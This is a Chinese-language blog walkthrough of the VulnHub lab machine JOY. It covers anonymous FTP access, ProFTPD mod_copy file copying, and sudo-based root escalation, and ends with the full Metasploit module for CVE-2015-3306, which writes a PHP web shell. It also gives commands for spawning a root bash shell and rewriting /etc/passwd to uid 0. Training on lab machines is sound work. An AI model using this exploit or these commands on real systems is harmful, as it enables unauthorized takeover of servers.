CA01H'S BLOG

文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox-Retired

HackTheBox-Active

VulnHub

代码审计

PHP代码审计

大数据安全

机器学习

基础学习

Python

Python基础

Python安全

Java

Java基础

Java安全

算法

Leetcode

随笔

经验

技术

 2020-02-29   1.8k

VulnHub::DigitalWorld.Local:JOY Walkthrough

0x01 Introduction

Does penetration testing spark joy? If it does, this machine is for you.

This machine is full of services, full of fun, but how many ways are there to align the stars? Perhaps, just like the child in all of us, we may find joy in a playground such as this.

This is somewhat OSCP-like for learning value, but is nowhere as easy to complete with an OSCP exam timeframe. But if you found this box because of preparation for the OSCP, you might as well try harder. 😃

If you MUST have hints for this machine (even though they will probably not help you very much until you root the box!): Joy is (#1): https://www.youtube.com/watch?v=9AvWs2X-bEA, (#2): something that should be replicated, (#3): what happens when you clean out seemingly “hidden” closets.

Note: There are at least two reliable ways of obtaining user privileges and rooting this machine. Have fun. 😃

Feel free to contact the author at https://donavan.sg/blog if you would like to drop a comment.

Download Link:https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

0x02 Tools and Tips

Scanning

  • Nmap

Enumeration

  • FTP anonymous login

Exploit

  • Exploit proftpd using Metasploit

Privilege Escalation

  • Sudo right

0x03 Pentesting

扫描网段,发现靶机IP地址192.168.0.108

扫描靶机端口:

发现FTP是可以匿名登录的,直接使用FileZilla工具登录站点查看文件

一路看下来发现directory文件列出了/home/patrick目录下的所有文件,剔除一些常见的和随机生成的文件之外,就剩下verison_control值得看一看,用下面的命令把文件复制到FTP站点目录:

telnet和ftp命令的区别:

telnet连接后,用户主机实际成为远程TELNET服务器的一个虚拟终端(或称是哑终端),一切服务完全在远程服务器上执行,但用户决不能从远程服务器中下载或上传文件,或拷贝文件到用户主机中来。

ftp则不同,它是采用客户机/服务器模式,用户能够操作FTP服务器中的目录,上传或下载文件,但用户不能请求服务器执行某个文件。

version_control文件如下:

1
2
3
4
5
6
7
8
9
10
11
12
Version Control of External-Facing Services:

Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12

We should switch to OpenSSH and upgrade ProFTPd.

Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.

提示我们ProFTP需要升级,我们先从这入手:

直接上Metasploit:

返回一个标准Shell:

查看当前目录下有哪些文件:

有一个L37ISF8.php文件是刚刚exp生成的,接着看ossec目录:

有一个比较可疑的文件patricksecretsofjoy

有patrick用户的登录密码,root的密码算是作者的恶搞吧。直接登录patrick用户,尝试提权:

到这里就有两种思路用来提权:

  1. 利用/home/patrick/script/test的脚本文件来更改/etc/passwd的权限,进而修改patrick用户的权限;

  2. 上传自己编写的脚本至相同的目录。这里就文字叙述一下具体过程:

    a) 首先在本机上编写Shell脚本echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test

    b) 再使用ftp上传到upload目录:

    1
    2
    3
    ftp 192.168.0.108
    cd upload
    put test

    c) 再使用telnet传入到/home/patrick/script

    1
    2
    3
    telnet 192.168.0.108 21
    site cpfr /home/ftp/upload/test
    site cpto /home/patrick/script/test

    d) 再执行test文件sudo /home/patrick/script/test

相对而言第一个思路会比较简单,修改权限:

修改Patrick用户的uid和gid:

这里可以直接登录靶机用nano修改,但是如何在主机上的反弹shell修改呢?因为反弹shell不支持vim, vi, nano等交互式窗口,但是别忘了还有一个sed命令可以用来编辑文件,sed '36,36s/1000:1000/0:0/g' /etc/passwd,上面这个命令表示修改/etc/passwd文件中的第36行,把1000:1000替换成0:0

重新登录一下就可以获得root权限了:

0x04 ProFTP 1.3.5 exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ProFTPD 1.3.5 Mod_Copy Command Execution',
      'Description'    => %q{
          This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
          Any unauthenticated client can leverage these commands to copy files from any
          part of the filesystem to a chosen destination. The copy commands are executed with
          the rights of the ProFTPD service, which by default runs under the privileges of the
          'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website
          directory, PHP remote code execution is made possible.
      },
      'Author'         =>
        [
          'Vadim Melihow', # Original discovery, Proof of Concept
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2015-3306' ],
          [ 'EDB', '36742' ]
        ],
      'Privileged'     => false,
      'Platform'       => [ 'unix' ],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'BadChars' => '',
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic gawk bash python perl'
            }
        },
      'Targets'        =>
        [
          [ 'ProFTPD 1.3.5', { } ]
        ],
      'DisclosureDate' => 'Apr 22 2015',
      'DefaultTarget' => 0))

    register_options(
      [
        OptPort.new('RPORT', [true, 'HTTP port', 80]),
        OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
        OptString.new('TARGETURI', [true, 'Base path to the website', '/']),
        OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']),
        OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www'])
      ], self.class)
  end

  def check
    ftp_port = datastore['RPORT_FTP']
    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)

    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
    else
      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
    end

    res = sock.get_once(-1, 10)
    unless res && res.include?('220')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
    end

    sock.puts("SITE CPFR /etc/passwd\r\n")
    res = sock.get_once(-1, 10)
    if res && res.include?('350')
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    ftp_port = datastore['RPORT_FTP']
    get_arg = rand_text_alphanumeric(5+rand(3))
    payload_name = rand_text_alphanumeric(5+rand(3)) + '.php'

    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)

    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
    else
      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
    end

    res = sock.get_once(-1, 10)
    unless res && res.include?('220')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
    end

    print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server")

    sock.puts("SITE CPFR /proc/self/cmdline\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('350')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")
    end

    sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('250')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")
    end

    sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('350')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")
    end

    sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('250')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")
    end

    sock.close

    print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}")
    res = send_request_cgi!(
      'uri' => normalize_uri(target_uri.path, payload_name),
      'method' => 'GET',
      'vars_get' => { get_arg => "nohup #{payload.encoded} &" }
    )

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload")
    end
  end

end
  靶机->VulnHub
 
Expand all Back to top Go to bottom
Copyright © ca01h 2019-2021 | 本站总访问量